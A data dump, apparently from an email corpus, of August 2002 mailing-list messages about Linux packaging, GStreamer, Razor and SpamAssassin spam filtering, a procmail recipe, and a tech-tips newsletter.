    <t>On Wed, Aug 14, 2002 at 10:59:22AM -0400, Thomas J. Baker wrote: &gt; Has anyone had any luck with the gstreamer repository? I'm using RH 7.3 &gt; and Ximian Gnome 2 snaps and the gstreamer stuff just doesn't work at &gt; all. Rhythmbox crashes on startup, gst-player can't play a simple mpg &gt; file, etc. I've been using the gstreamer repository with Rawhide Gnome 2 for the last month or so with no problems. Even the new rhythmbox works (if you can call taking 5 minutes to load my mp3 directory "working"). It might be something with Ximian's Gnome 2 snaps. AFAIK, they're  pretty much straight out of CVS and hence a lot more experimental than  some of the other Gnome 2 packages out there. gary _______________________________________________ RPM-List mailing list  [URL]http://lists.freshrpms.net[/URL]</t>
  </si>
  <si>
    <t>To: "'ilug@linux.ie'" &lt;ilug@linux.ie&gt;\nFrom: Gary Coady &lt;gary+dated+1029782579.faabce@netsoc.tcd.ie&gt;\nDate: Wed, 14 Aug 2002 19:42:58 +0100</t>
  </si>
  <si>
    <t>Wed, 14 Aug 2002 19:42:58 +0100</t>
  </si>
  <si>
    <t>Gary Coady &lt;gary+dated+1029782579.faabce@netsoc.tcd.ie&gt;</t>
  </si>
  <si>
    <t>POTW (Was Re: [ILUG] mirroring on a running system)</t>
  </si>
  <si>
    <t>Takers galore possibly (me inclusive). Especially when the subject\nis more on-topic :-)\n\nGary.\n\nOn Wed, Aug 14, 2002 at 10:08:03AM +0100, Wynne, Conor wrote:\n&gt; All right, can't get pissed though as its a week-day. If we were to do\n&gt; it in Lucan, that would be another story ;--)\n&gt; \n&gt; Do we have many takers? \n&gt; \n&gt; CW\n&gt; \n&gt; -------------\n&gt; On Wed, Aug 14, 2002 at 09:22:27AM +0100, Wynne, Conor mentioned:\n&gt; &gt; When are we going to have a pint? \n&gt; \n&gt;  Tuesday next week. Boars Head, Capel st.\n&gt; \n&gt; Kate\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: &lt;rpm-zzzlist@freshrpms.net&gt;\nFrom: "Harig, Mark A." &lt;maharig@idirect.net&gt;\nDate: Wed, 14 Aug 2002 18:46:22 -0400</t>
  </si>
  <si>
    <t>Wed, 14 Aug 2002 18:46:22 -0400</t>
  </si>
  <si>
    <t>Documentation about RPM macros?</t>
  </si>
  <si>
    <t>Hi,    Can someone tell me where I can find some    documentation about rpm macros?  In    particular, I'd like to understand the    '%files devel', '%post -p', and '%postun -p'    uses described at      [URL]http://freshrpms.net[/URL]    and, more generally, I'm looking for a    more detailed description of the available    macros and the options they accept.  There's    no description of the above uses of %file,    %post, or %postun in the maximum-rpm book.    Thanks in advance for any help! --- _______________________________________________ RPM-List mailing list  [URL]http://lists.freshrpms.net[/URL]</t>
  </si>
  <si>
    <t>To: "Sven Willenberger" &lt;sven@dmv.com&gt;\nFrom: "zeek" &lt;zeek@sparklehouse.com&gt;\nDate: Wed, 14 Aug 2002 18:41:32 -0400</t>
  </si>
  <si>
    <t>Wed, 14 Aug 2002 18:41:32 -0400</t>
  </si>
  <si>
    <t>"zeek" &lt;zeek@sparklehouse.com&gt;</t>
  </si>
  <si>
    <t>"Sven Willenberger" &lt;sven@dmv.com&gt;</t>
  </si>
  <si>
    <t>RE: [Razor-users] Ricochet Question Actually</t>
  </si>
  <si>
    <t>formail did the trick. Thanks to those who answered. For the sake of archives, here's how to "patch" ricochet: 1. procmailrc (/tmp/pmrc): RICOCHET=/usr/local/etc/ricochet PMDIR=/tmp LOGFILE=$PMDIR/pmlog VERBOSE=yes MAILDIR=/tmp LOGABSTRACT=all :0 f | /usr/local/bin/ri2 2. /usr/local/bin/ri2 (to test): #!/bin/sh /usr/local/bin/ricochet -DONT_SEND &gt;/tmp/rico.$$ 3. formmail exec: formail -ds procmail /tmp/pmrc  -----Original Message----- &gt; From: razor-users-admin@example.sourceforge.net &gt; [mailto:razor-users-admin@lists.sourceforge.net]On Behalf Of Sven &gt; Willenberger &gt; Sent: Tuesday, August 13, 2002 4:06 PM &gt; To: zeek@sparklehouse.com &gt; Cc: razor-users@example.sourceforge.net &gt; Subject: Re: [Razor-users] Ricochet Question Actually &gt; &gt; &gt; &gt; &gt; ----- Original Message ----- &gt; &gt; From: "zeek"  &gt; &gt; To:  &gt; &gt; Date: Tue, 13 Aug 2002 12:07:10 -0400 &gt; &gt; Subject: [Razor-users] Ricochet Question Actually &gt; &gt; &gt; &gt; &gt; &gt; Greetings, &gt; &gt; &gt; &gt; I've not been able to find a list regarding ricochet (closely related to &gt; &gt; razor: [URL]http://www.vipul.net[/URL] so I'm posting here. &gt; &gt; &gt; &gt; Every few days I manually go through a spam harvest that Spamassassin &gt; &gt; collects (by way of checking against osirosoft, razor, et. &gt; al.). I do this &gt; &gt; with elm and for each piece of verified spam I pipe it to ricochet which &gt; &gt; sends it off to the various parties involved (not as accurate &gt; as I'd like &gt; &gt; BTW). Needless to mention this is quite tedious and takes a considerable &gt; &gt; amount of time. &gt; &gt; &gt; &gt; My question, which is more of a perl/regexp question, is anyone &gt; aware of a &gt; &gt; script that can take an entire mailbox (in proper UNIX mbox format) and &gt; &gt; handle each piece of mail in it? To clarify, I'm looking for something &gt; which &gt; &gt; takes each piece of mail in a mailbox and pipes it to ricochet. This is &gt; very &gt; &gt; similar to what razor-report does with the -M option. &gt; &gt; &gt; &gt; Assuming that you have procmail installed you also have its companion &gt; formail. Formail can be used to parse an mbox into its component &gt; emails and &gt; pass them to procmail. Specifiy a procmailrc file to use to &gt; filter/test/send &gt; each email and you're good to go. You could even set it up as a cron ... &gt; &gt; example: assuming your mailbox/email is "spambox" &gt; &gt; `formail -ds procmail /home/spambox/customProcmailrc &lt; /var/mail/spambox` &gt; &gt; This will take the mbox /var/mail/spambox break it apart at the message &gt; separator ('^From '), send it off to procmail and instruct procmail to use &gt; the "customProcmailrc" config file found in spambox's home directory. That &gt; "customProcmailrc" would contain your rules for how to handle &gt; each mail and &gt; send it where it needs to go .... &gt; &gt; &gt; &gt; Cheers, &gt; &gt; -zeek &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; --__--__-- &gt; &gt; &gt; &gt; Message: 11 &gt; &gt; Date: Tue, 13 Aug 2002 11:58:03 -0500 &gt; &gt; To: razor-users@example.sourceforge.net &gt; &gt; From: Justin Shore  &gt; &gt; Subject: [Razor-users] Stripping the SpamAssassin report &gt; &gt; &gt; &gt; I'm assuming I need to strip the SpamAssassinReport.txt attachments &gt; &gt; from my spam mailbox before I run the mailbox through razor-report, &gt; &gt; correct?  Does anyone know of an easy way to do this? &gt; &gt; &gt; &gt; Thanks &gt; &gt;   Justin &gt; &gt; -- &gt; &gt; &gt; &gt; -- &gt; &gt; Justin Shore, ES-SS ES-SSR      Pittsburg State University &gt; &gt; Network &amp; Systems Manager       Kelce 157Q &gt; &gt; Office of Information Systems   Pittsburg, KS 66762 &gt; &gt; Voice: (620) 235-4606           Fax: (620) 235-4545 &gt; &gt; [URL]http://www.pittstate.edu[/URL] &gt; &gt; &gt; &gt; Warning:  This message has been quadruple Rot13'ed for your protection. &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; --__--__-- &gt; &gt; &gt; &gt; _______________________________________________ &gt; &gt; Razor-users mailing list &gt; &gt; Razor-users@lists.sourceforge.net &gt; &gt; [URL]https://lists.sourceforge.net[/URL] &gt; &gt; &gt; &gt; &gt; &gt; End of Razor-users Digest &gt; &gt; &gt; &gt; ------------------------------------------------------- &gt; This sf.net email is sponsored by: Dice - The leading online job board &gt; for high-tech professionals. Search and apply for tech jobs today! &gt; [URL]http://seeker.dice.com[/URL] &gt; _______________________________________________ &gt; Razor-users mailing list &gt; Razor-users@lists.sourceforge.net &gt; [URL]https://lists.sourceforge.net[/URL] &gt; ------------------------------------------------------- This sf.net email is sponsored by: Dice - The leading online job board for high-tech professionals. Search and apply for tech jobs today! [URL]http://seeker.dice.com[/URL] _______________________________________________ Razor-users mailing list Razor-users@lists.sourceforge.net [URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>http://www.vipul.net http://www.pittstate.edu https://lists.sourceforge.net http://seeker.dice.com https://lists.sourceforge.net http://seeker.dice.com https://lists.sourceforge.net</t>
  </si>
  <si>
    <t>To: Patrick &lt;patrick@stealthgeeks.net&gt;\nFrom: Vipul Ved Prakash &lt;mail@vipul.net&gt;\nDate: Wed, 14 Aug 2002 18:00:16 -0700</t>
  </si>
  <si>
    <t>Wed, 14 Aug 2002 18:00:16 -0700</t>
  </si>
  <si>
    <t>Re: [Razor-users] Re: What's wrong with the Razor servers now?</t>
  </si>
  <si>
    <t>On Wed, Aug 14, 2002 at 02:47:02PM -0700, Patrick wrote:\n&gt; Is there a point that you plan on releasing detailed information about\n&gt; TeS, so we can stop engaging in idle speculation?\n&gt;\n&gt; It's not my desire to second-guess you Vipul (however much my missives\n&gt; may appear otherwise) or question the hard work you and the other\n&gt; developers have put into the system, however it seems that every request\n&gt; for such information has been met with silence.\n\nThere are no plans for releasing details about TeS. Before the\nrelease of Razor2, I'd pointed out that Razor2 backend (specially\nTeS) will be closed.\n\ncheers,\nvipul.\n\n-- \n\nVipul Ved Prakash          |   "The future is here, it's just not \nSoftware Design Artist     |    widely distributed."\n[URL]http://vipul.net[/URL]          |              -- William Gibso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Justin Mason &lt;yyyy@netnoteinc.com&gt;\nFrom: Vipul Ved Prakash &lt;mail@vipul.net&gt;\nDate: Wed, 14 Aug 2002 17:39:50 -0700</t>
  </si>
  <si>
    <t>Wed, 14 Aug 2002 17:39:50 -0700</t>
  </si>
  <si>
    <t>Justin Mason &lt;yyyy@netnoteinc.com&gt;</t>
  </si>
  <si>
    <t>Justin, can SA say "Listed in Razor2" when using Razor2? I get a lot of\nreports that are misreports to Razor1 not Razor2.\n\nIf this is Razor2, then revocation will fix the problem. \n\ncheers,\nvipul.\n\nOn Wed, Aug 14, 2002 at 11:56:26AM +0100, Justin Mason wrote:\n&gt; \n&gt; As the proud new owner of a free antarc.tk domain ;), I got a confirmation\n&gt; mail, which fell into Razor.\n&gt; \n&gt; Looks like the fuzzy matching will hit on all confirmation mails until\n&gt; it's whitelisted.\n&gt; \n&gt; just fyi,\n&gt; \n&gt; --j.\n&gt; \n&gt; ------- Forwarded Message\n&gt; \n&gt; Date:    Wed, 14 Aug 2002 11:37:35 -0000\n&gt; From:    support@dot.tk (Dot TK registration center)\n&gt; To:      xxxxxx@xxxxx.xxx\n&gt; Subject: *****SPAM***** Please confirm your free registration\n&gt; \n&gt; SPAM: -------------------- Start SpamAssassin results ----------------------\n&gt; SPAM: This mail is probably spam.  The original message has been altered\n&gt; SPAM: so you can recognise or block similar unwanted mail in future.\n&gt; SPAM: See [URL]http://spamassassin.org[/URL] for more details.\n&gt; SPAM: \n&gt; SPAM: Content analysis details:   (7.5 hits, 7 required)\n&gt; SPAM: SEE_FOR_YOURSELF   (2.8 points)  BODY: See for yourself\n&gt; SPAM: SPAM_PHRASE_13_21  (1.5 points)  BODY: Contains phrases frequently found in spam\n&gt; SPAM: RAZOR_CHECK        (3.0 points)  Listed in Razor, see [URL]http://razor.sourceforge.net[/URL]\n&gt; SPAM: MSG_ID_ADDED_BY_MTA_3 (0.2 points)  'Message-Id' was added by a relay (3)\n&gt; SPAM: \n&gt; SPAM: -------------------- End of SpamAssassin results ---------------------\n&gt; \n&gt; \n&gt; Malo ni! \n&gt; and thank you (faka fetai) \n&gt; for registering with Dot TK!\n&gt; \n&gt; Your e-mail address : xxxxxxx@xxxxx.xxx\n&gt; password: xxxxxxxxx\n&gt; \n&gt; confirmation code: xxxxxxx\n&gt; (please note: this is not your password)\n&gt; \n&gt; As you know we like to keep things simple, so all you need \n&gt; to do to activate your Dot TK address is...\n&gt; \n&gt; 1. Go to [URL]http://my.dot.tk[/URL]\n&gt; \n&gt; 2. And enter your confirmation code\n&gt; \n&gt; If you have received this email, but did not join us @ Dot TK,\n&gt; then somebody tried to register using your e-mail address. \n&gt; \n&gt; You can simply ignore this message... But why not come on in, \n&gt; and see for yourself if your own -free- domain name is still \n&gt; available at [URL]http://www.dot.tk[/URL]\n&gt; \n&gt; Any questions? Please visit our feedback page at\n&gt; [URL]http://www.dot.tk[/URL]\n&gt; Hope to see you soon at Dot TK.\n&gt; \n&gt; Dot TK -- Dividing Domains Differently.\n&gt; \n&gt; \n&gt; \n&gt; ------- End of Forwarded Message\n&gt; \n&gt; \n&gt; \n&gt; -------------------------------------------------------\n&gt; This sf.net email is sponsored by: Dice - The leading online job board\n&gt; for high-tech professionals. Search and apply for tech jobs today!\n&gt; [URL]http://seeker.dice.com[/URL]\n&gt; _______________________________________________\n&gt; Razor-users mailing list\n&gt; Razor-users@lists.sourceforge.net\n&gt; [URL]https://lists.sourceforge.net[/URL]\n\n-- \n\nVipul Ved Prakash          |   "The future is here, it's just not \nSoftware Design Artist     |    widely distributed."\n[URL]http://vipul.net[/URL]          |              -- William Gibson</t>
  </si>
  <si>
    <t>http://spamassassin.org http://razor.sourceforge.net http://my.dot.tk http://www.dot.tk http://www.dot.tk http://seeker.dice.com https://lists.sourceforge.net http://vipul.net</t>
  </si>
  <si>
    <t>To: rpm-zzzlist@freshrpms.net\nFrom: Brian Fahrlander &lt;kilroy@kamakiriad.com&gt;\nDate: Wed, 14 Aug 2002 17:29:08 -0500</t>
  </si>
  <si>
    <t>Wed, 14 Aug 2002 17:29:08 -0500</t>
  </si>
  <si>
    <t>On 14 Aug 2002 10:59:22 -0400, "Thomas J. Baker"  wrote: &gt; Has anyone had any luck with the gstreamer repository? I'm using RH 7.3 &gt; and Ximian Gnome 2 snaps and the gstreamer stuff just doesn't work at &gt; all. Rhythmbox crashes on startup, gst-player can't play a simple mpg &gt; file, etc.     I'm in your same shoes- I can get it upgraded and all, but I can never seem to work out where to start out with the thing; it strikes me as confusing!  But to be fair, I appreciate the pipline idea; just as it's useful on the commandline, it'll be emensely powerful for manipulating multimedia, too.    It's just not EASY yet.  I'm sure all kindsa glade-produced front-ends will come up for it soon, though.  And the docs are complete, too...   ------------------------------------------------------------------------ Brian Fahrlnder              Linux Zealot, Conservative, and Technomad Evansville, IN                    My Voyage: [URL]http://www.CounterMoon.com[/URL] ICQ  5119262 ------------------------------------------------------------------------ "Waddling" into the mainstream?  I suppose... [URL]http://www.usatoday.com[/URL] _______________________________________________ RPM-List mailing list  [URL]http://lists.freshrpms.net[/URL]</t>
  </si>
  <si>
    <t>http://www.CounterMoon.com http://www.usatoday.com http://lists.freshrpms.net</t>
  </si>
  <si>
    <t>To: xxxxxxxxxxxxxxxxx-neatnettricks@example.com\nFrom: NNT@silver.lyris.net\nDate: Wed, 14 Aug 2002 16:20:00 -0700</t>
  </si>
  <si>
    <t>Wed, 14 Aug 2002 16:20:00 -0700</t>
  </si>
  <si>
    <t>NNT@silver.lyris.net</t>
  </si>
  <si>
    <t>xxxxxxxxxxxxxxxxx-neatnettricks@example.com</t>
  </si>
  <si>
    <t>Neat Net Tricks Standard Issue 131 - August 15, 2002</t>
  </si>
  <si>
    <t>IN THIS ISSUE:\n\n01. Secure IE\n02. Disk cleanup on XP\n03. Thanks but no thanks\n04. Mouseless way home\n05. Kartoo\n06. XP time feature\n07. Leaf Peeper Alert\n08. Saving scraps\n09. Quick access\n10. Don't believe your email\n\nAnd What's Coming Up Next Week in NNT Premium\n\n01. SECURE IE.  For the past month or so, our Software Review Panel has \nbeen giving a grueling test to Secure IE, a piece of software that blocks \nFlash and pop-ups, prevents malicious file downloads, lets you customize \nSecurity Zone settings as you browse dozens of Web sites simultaneously up \nto five times faster with a tabbed interface, annotate Web page with sticky \nnotes and highlighter, and save complete Web pages, even secure server \n(HTTPS) pages and archive online transaction receipts.  For what we believe \nis one of the most thorough reviews ever conducted on a single piece of \nsoftware, check out what our Panel had to say at \n[URL]http://www.NeatNetTricks.com[/URL] .  For a free trial download, \nvisit [URL]http://www.secureie.com[/URL] .  And if this one sweeps you off your feet, \ngo to the NNT Store at [URL]http://www.NeatNetTricks.com[/URL] and get a super \ndeal, just $17.50 if you order before September 14.  With a 30-day \nguarantee, what's to lose?\n\n02. DISK CLEANUP ON XP.  Windows XP users can do some fast cleaning chores \nwith Disk Cleanup.  Access this tool from the Start menu by right clicking \non your hard drive.  Then select Properties and click on the Disk Cleanup \nbutton to determine how many files can be safely deleted.\n\n03. THANKS BUT NO THANKS.  Continuing our periodic feature of \nless-than-useful sites on the Web:  The International Center for Bathroom \nEtiquette at [URL]http://www.icbe.org[/URL] gets our recognition this issue.  It says \nit's working hard to bring you the latest in cutting edge research and \ntechnology regarding bathroom etiquette.  We'll resist some obvious puns.\n\n. . . . .\n\nWest Virginia's Diane Stratton recommended NNT to some friends and is now \nenjoying QuicKeys 2.0, a great Windows management software package.  Diane \nis our latest winner and you could be next.  Just go to the NNT Web site at \n[URL]http://www.NeatNetTricks.com[/URL] and click on "Recommend NNT."  Nothing could \nbe easier.\n\n. . . . .\n\n04. MOUSELESS WAY HOME.  To go home quickly in Internet Explorer, touch F6 \nto highlight the Address Bar and type two periods (..) there.  The Enter \nkey then takes you home.\n\n05. KARTOO.  Search engines are everywhere on the Internet but Kartoo at \n[URL]http://www.kartoo.net[/URL] is quite unusual.  It's a meta search engine that \ndisplays results on a map in the form of a ball.  The larger the ball, the \nmore relevant the result.  As you mouseover each result, site descriptions \nare revealed.  If all that sounds confusing, the explanation is more \ncomplicated than the service itself.  Just try it.\n\n. . . . .\n\nYou should make it a habit to visit the NNT Store at \n[URL]http://www.NeatNetTricks.com[/URL] . We try to have several great products \nthere at a limited-time price much less than anywhere else on the Net. \nCurrently, you'll find excellent ebooks, a very effective popup stopper, \nand the very useful utility described in item 01 above, along with the \nusual opportunity to subscribe to NNT Premium and ArchivesExpress.  Check \nus out, you'll be glad you did.\n\n. . . . .\n\n06. XP TIME FEATURE.  Windows XP added a nice feature that heretofore \nrequired a separate software application.  It will connect, either at a \nprogrammed time or manually, to a time server via the Internet and reset \nthat often erroneous internal clock.  Just click on the time in the systems \ntray, go to Date and Time Properties and click the Internet Time tab.\n\n07. LEAF PEEPER ALERT.  A bit early, but soon the changing colors of autumn \nwill begin here in the U.S.  For those who like to follow the display, \nconsider [URL]http://www.stormfax.com[/URL] for a comprehensive collection \nof links and toll-free numbers to each state to determine peak color times.\n\n08. SAVINGS SCRAPS.  Some oldies are worth repeating.  If you're working \nwith text in, for example, MS Word or WordPad, and would like a handy way \nto save a portion for later easy retrieval, just select (highlight) it and \nclick/drag it to your desktop.  When the newly created icon is clicked on, \nit will show the application with which the scrap was created, along with \nthe first few words of the text.  A double click opens the text in the \napplication with which it was created.\n\n09. QUICK ACCESS.  To go to a frequently used program, you may find \nyourself drilling down to the desktop and searching out the shortcut \nicon.  Consider instead setting up a key combination that will provide \nquick access without using the shortcut. Right click on the shortcut and \nselect Properties.  In the Shortcut key window, select any key you can \nremember and click OK.  Ctrl+Alt and that key will open the application \nwhenever needed.\n\n10.  DON'T BELIEVE YOUR EMAIL.  We've been asked about those emails with \nvirus attachments that appear to be coming from NNT, asking for a \nconfirmation of a subscription.  Don't believe it, and don't open the \nattachments.  Maybe this exchange between NNT and Lyris (our mail manager) \nwill clear things up:\n\nNNT: Is there anything that can be done about the current strains of virus \nthat implant on address books and randomly send email asking alleged \nsubscribers to verify their subscription (when they haven't subscribed at \nall)? I've received some of these as well, and I know it's become a \nwidespread problem with other ezine publishers, creating a lot of ill will \nall around.  Is there some configuration that we could change to keep \nthese from going out except to legitimate subscribers?\n\nLyris:  Unfortunately, there isn't much we can do about this since it \nisn't actually ListManager doing the sending.  The real problem is that \npeople sometimes will add the "join" address to their address book and \nthat is what causes the problems.  The best we can do is advise people not \nto have their address books set to automatically add any email address \nthat they send a message to even once.  The main culprit here seems to be \nOutlook Express.\n\nWHAT'S COMING NEXT WEEK:  Another batch of Neat Net Tricks in the Premium \nissue, including:\n\n*  A great collection of information and free downloads to make your system \nmore secure.\n\n*  Free software to measure and display your real-time Internet speed.\n\n*  Can you handle still another popup stopper - that's interference free - \nand at no cost?\n\n*  An easy-to-use tool to store and arrange all your passwords, user IDs, \nand other info.\n\n*  A Microsoft Word tip to easily work around that pesky autocompletion \nfeature.\n\n*  A whole arsenal of tools to combat spam.\n\n*  Software that provides more than 200 interesting facts about your \ncomputer and displays about your CPU, memory, operating system, and your \ncomputer's power source.\n\n*  Our in-depth article discusses how to best manage our important \npasswords and get out of trouble when we -inevitably - forget those passwords.\n\nAnd more!  If you haven't subscribed yet, you won't find a better source of \nuseful information for just 42 cents per issue.  That's $10 for a year's \nworth - 24 issues - at the NNT Store, [URL]http://www.NeatNetTricks.com[/URL] .\n\n. . . . . .\n\nNNT makes no endorsement or warranty, expressed or implied, with regard to \nfeatured products or services. Results may vary based on operating systems \nand other variables beyond our control.\n\nFor info on how to subscribe, unsubscribe, or change your address, send a \nblank email to info-neatnettricks@silver.lyris.net .\n\nSponsor an entire issue of NNT with your exclusive message to our readers \nat very low rates. Send a blank email to \nadvertise-neatnettricks@silver.lyris.net .\n\nComments or questions about your computer and the Internet? Visit the NNT \nBulletin Board at [URL]http://www.escribe.com[/URL] .\n\nNNT is hosted by Lyris.com, the best in email list management.\n\nCopyright 2002 by Jack Teems. All rights reserved. Neat Net Tricks is \nregistered with the U.S. Library of Congress ISSN: 1533-4619. \n\n\n---\nYou are currently subscribed to neatnettricks as: xxxxxxxxxxxxxxxxx-neatnettricks@example.com\nTo unsubscribe send a blank email to leave-neatnettricks-2424157K@silver.lyris.net</t>
  </si>
  <si>
    <t>http://www.NeatNetTricks.com http://www.secureie.com http://www.NeatNetTricks.com http://www.icbe.org http://www.NeatNetTricks.com http://www.kartoo.net http://www.NeatNetTricks.com http://www.stormfax.com http://www.NeatNetTricks.com http://www.escribe.com</t>
  </si>
  <si>
    <t>To: razor-users@example.sourceforge.net\nFrom: Jehan &lt;nahor@bravobrava.com&gt;\nDate: Wed, 14 Aug 2002 16:05:13 -0700</t>
  </si>
  <si>
    <t>Wed, 14 Aug 2002 16:05:13 -0700</t>
  </si>
  <si>
    <t>Jehan &lt;nahor@bravobrava.com&gt;</t>
  </si>
  <si>
    <t>[Razor-users] Re: many vs one</t>
  </si>
  <si>
    <t>Oates, Isaac wrote:\n &gt; First, 1,000 people will have seen the piece of spam that could've\n &gt; been avoided.  But the other 99,000 will never see that spam.  Evenly\n &gt; distributed, it means that an average user will only see 1% of spam.\n &gt; That's not realistic, because not everyone will get the same spam,\n &gt; but the basic threshold can be adjusted.  At the very least, 30\n &gt; people need to "vote" on a given piece of mail to make a realistic\n &gt; decision.  Since there's no "no" vote mechanism (except\n &gt; revocation--and that's after the fact), only a "yes" vote mechanism\n &gt; exists and so if you received 30 "yes" votes then you could safely\n &gt; say that you got a reasonable sample.\n\nI'm not sure that I follow your reasoning here. Razor isn't your mail \nserver. It doesn't keep in your mail. You don't request your mail there. \nNor do most people check for spam only when they are going to read their \nmail. My setup check a mail against Razor when my server receives it, \nnot when I'm going to read it. If you wait to get 1000 reply for a mail, \nit means you have to wait for 1000 people to read it (at least, some \npeople may not vote because they don't want to vote that day or because \nthey don't think it's spam). Knowing that about half the planet would be \nsleeping (night time) and thus not reading their mail, it would mean \nthat at least 2000 people already received the mail in their inbox. \nKnowing that, among the people who are not sleeping, not all of them are \nconstantly reading their mail. I would say that less than 1 people over \n10 read their mail as soon as it arrives. That means that 20,000 people \nalready recieved the mail and checked it against the Razor database \nbefore you would get your 1000 votes.\n\nAlso, with your system, 99% is the best you could get. If you wait for \nonly one vote, maybe only 20 guy would read the mail (1 to vote, 10 \nsleeping, and 9 not reading their mail soon enough). Wich gives a value \n99.98%. That's far better than your 99% don't you think.\nIn RealLife(tm), most likely one guy voting won't be enough but the \nthing is that it will stop the spam as early as possible.\n\nAlso, if for some reason, this mail is one of those people don't agree \non whether it is spam or not, it would take a while to revoke those 1000 \nreports, which means that some people may lose this legitimate (to them) \nmail.\n\nYou mentioned that with this system, people will re-report less often. \nFirst, I don't see how waiting *longer* before making a decision on the \nlegitimacy of a mail will reduce re-reporting. The more you wait, the \nmore people will get the mail in their inbox, the more people will see \nthe mail (again, not everybody check their mail against Razor at read \ntime, most do it a reception time using procmail/spamassassin). Second, \nre-reporting has its use, it increase the confidence that a mail is spam.\n\nSo I don't see what you gain with your 1000 people.\n\n	Jehan\n\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Vipul Ved Prakash &lt;mail@vipul.net&gt;\nFrom: Patrick &lt;patrick@stealthgeeks.net&gt;\nDate: Wed, 14 Aug 2002 14:47:02 -0700 (PDT)</t>
  </si>
  <si>
    <t>Wed, 14 Aug 2002 14:47:02 -0700 (PDT)</t>
  </si>
  <si>
    <t>On Mon, 12 Aug 2002, Vipul Ved Prakash wrote:\n\n&gt; On Mon, Aug 12, 2002 at 10:38:44AM -0700, Craig R . Hughes wrote:\n&gt; &gt; This is, I think the biggest fallacy here.  You don't have to\n&gt; &gt; block jack shit to get a high trust rating, you just have to\n&gt; &gt; confirm Razor's existing opinion on a large number of messages:\n&gt; &gt;\n&gt; &gt; if(check() == spam) then submit() else revoke()\n&gt; &gt;\n&gt; &gt; That algorithm boosts trust, but reduces the information in\n&gt; &gt; SpamNet by damping.\n&gt;\n&gt; Again, this is not true. Only certain events (reports/revokes) for a spam\n&gt; are rewarded and the algorithm for picking these up is based on many\n&gt; different factors.\n\nAnd those would be????\n\nIs there a point that you plan on releasing detailed information about\nTeS, so we can stop engaging in idle speculation?\n\nIt's not my desire to second-guess you Vipul(however much my missives may\nappear otherwise) or question the hard work you and the other\ndevelopers have put into the system, however it seems that every request\nfor such information has been met with silence.\n\nThanks.\n\n/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\\n                               Patrick Greenwell\n         Asking the wrong questions is the leading cause of wrong answers\n\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\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Patrick" &lt;patrick@stealthgeeks.net&gt;\nFrom: "Oates, Isaac" &lt;ioates@amazon.com&gt;\nDate: Wed, 14 Aug 2002 14:24:46 -0700</t>
  </si>
  <si>
    <t>Wed, 14 Aug 2002 14:24:46 -0700</t>
  </si>
  <si>
    <t>"Oates, Isaac" &lt;ioates@amazon.com&gt;</t>
  </si>
  <si>
    <t>"Patrick" &lt;patrick@stealthgeeks.net&gt;</t>
  </si>
  <si>
    <t>RE: [Razor-users] many vs one</t>
  </si>
  <si>
    <t>First, 1,000 people will have seen the piece of spam that could've been avoided.  But the other 99,000 will never see that spam.  Evenly distributed, it means that an average user will only see 1% of spam.  That's not realistic, because not everyone will get the same spam, but the basic threshold can be adjusted.  At the very least, 30 people need to "vote" on a given piece of mail to make a realistic decision.  Since there's no "no" vote mechanism (except revocation--and that's after the fact), only a "yes" vote mechanism exists and so if you received 30 "yes" votes then you could safely say that you got a reasonable sample.\n\nThe system could pretend to have never seen the piece of mail until after it determined that it was probably spam.  So instead of a rating going up incrementally, it would take a big leap at the beginning (from undefined to a relatively high number) and then go from there.  So after the first group of people (our samplers, we'll say) have seen the spam, no one else would ever see it.\n\nAs far as unsubscribing, I'm always leery of clicking on the link (and don't do so unless I specifically remember signing up for something), but the sample population will decide for themselves whether they feel that it's spam.\n\nSo ultimately, I guess I'm saying that the most effective route would be to use a constantly changing sample pool and just accept that there is some fraction of users that will have to see the spam.  In a system that depends on people deciding whether or not something is spam, is there any other way?\n\nIsaac\n\n-----Original Message-----\nFrom: Patrick\nSent: Wednesday, August 14, 2002 2:13 PM\nTo: Oates, Isaac\nCc: razor-users@example.sourceforge.net\nSubject: Re: [Razor-users] many vs one\n\nOn Wed, 14 Aug 2002, Oates, Isaac wrote:\n\n&gt; I'm new to razor but have studied trust systems before.  I've been following\n&gt; the threads about TeS and have a few thoughts.\n&gt;\n&gt; First, a more complex algorithm is not always better.  As soon as you start\n&gt; accounting for edge cases in what should otherwise be a generalized\n&gt; algorithm, general performance begins to degrade exponentially.  The\n&gt; thing that razor should have going for it is numbers.  Say that razor\n&gt; has 100,000 people that actively use it (i.e. click the "Spam" button on\n&gt; their mail reader from time to time.)  If we decide that our objective\n&gt; is to screen 99.0% of spam, it means that we can continue to show what\n&gt; appears to be a piece of spam to 1,000 people and still meet our\n&gt; objective.\n&gt;\n&gt; Why not just wait for 1,000 people to vote that a piece of mail is indeed\n&gt; spam before ever acknowledging that it could potentially be spam?  In\n&gt; other words, when I razor-report a message, should I be able to tell\n&gt; that razor has ever even seen that message?\n\nBecause you then have a system that is ineffective to a varying degree. A\nsimplistic view would be that 999 subscribers received a piece of spam\nthat could have otherwise been avoided. But the reality is likely that\nmany, many more individuals would have received the piece of spam when you\nfactor in report times.\n\n&gt; By having the server pretend to never have seen it, you can avoid\n&gt; people who just re-report spam because it was already marked as spam,\n&gt; something that is completely useless.\n\nWrong. razor-check will tell you if a specific piece of mail matches\nsomething already in the database. If you have the system pretend to have\nnever seen a piece of mail, how do you propose people use the system for\nfiltering?\n\n&gt; What about revocations?  A revocation is after the fact because a\n&gt;  substantial number of people (1,000, in this example) have already\n&gt; decided that they do not want that message.  If it is marked as spam by\n&gt; all those people, and then people start revoking it, what does that\n&gt; mean?\n\n&gt; It means that the revokers have an opinion that probably doesn't mesh\n&gt; with the majority;\n\nNo, it means that the people doing the revoking have a different opinion\nthan the 1000 people who have submitted it as spam. Rather the 1000 people\nwho have reported the message as spam constitute a majority or not is\nsomething that would have to be determined in the context of the\nindividual message.\n\n&gt; instead of messing with its rating, why not just put\n&gt; it on the whitelist?  If I want that ZDNet mail, and most people think\n&gt; that ZDNet mail is just plain annoying, then why can't I whitelist it,\n&gt; instead of "arguing" with everyone about whether or not 